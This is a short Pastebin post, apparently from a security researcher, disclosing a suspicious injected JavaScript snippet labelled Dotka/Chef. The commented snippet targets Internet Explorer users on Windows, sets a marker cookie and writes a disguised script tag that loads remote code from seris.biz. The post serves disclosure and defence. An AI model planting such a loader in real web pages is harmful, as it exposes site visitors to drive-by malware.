Advertisement
Neonprimetime

Suspicious Javascript: Dotka/Chef

Dec 16th, 2014
293
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 0.61 KB | None | 0 0
  1. Suspicious/Malicious
  2. Reported by neonprimetime security
  3. http://neonprimetime.blogspot.com
  4.  
  5. ******
  6.  
  7. // If their evil cookie does not exist
  8. //     If User Agent contains 'Windows NT' and 'MSIE'
  9. //           create their evil cookie
  10. //           create their evil script link that does malicious things
  11. d=document;ua=navigator.userAgent;if(d._zx===undefined && d.cookie.search('_utmud=')===1 && ua.search('Windows NT')>0 && ua.search('MSIE ')>0{d._zx=1;d.cookie='__utmud=1; expires=Wed, 01 Jan 2020 00:00:00 UTC; path=/'; d.writeln("<scr"+"ipt src='http://seris.biz/56ff9cc0.js?cp=ads.giftinc.com'></scri"+"pt>");}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement